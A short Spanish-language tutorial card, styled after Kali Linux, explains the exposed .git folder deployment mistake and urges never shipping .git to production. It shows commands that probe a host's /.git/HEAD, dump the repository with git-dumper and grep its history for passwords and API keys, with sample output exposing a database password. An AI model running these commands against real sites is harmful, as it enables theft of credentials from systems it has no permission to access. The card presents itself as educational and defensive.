KALI
Secretos en un .git expuesto
Un error de despliegue muy común: dejar la carpeta punto git accesible en la web.
Con eso, se puede descargar todo el historial del código fuente, con contraseñas y llaves que quedaron en commits viejos. git-dumper reconstruye el repositorio completo desde la web.
Luego, con las herramientas de git, buscas secretos en toda la historia. Un solo punto git expuesto puede entregar las llaves de todo el reino.
Nunca subas el punto git a producción.
# los comandos
kali@kali:~$ curl -s http://10.0.0.5/.git/HEADcopiarref: refs/heads/main <- .git expuesto!
kali@kali:~$ git-dumper http://10.0.0.5/.git/ ./codigocopiar[+] Fetched objects
[+] Running git checkout .
kali@kali:~$ cd codigo && git log -p | grep -iE 'password|secret|api_key'copiar+ DB_PASS = 'Verano2026!'
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.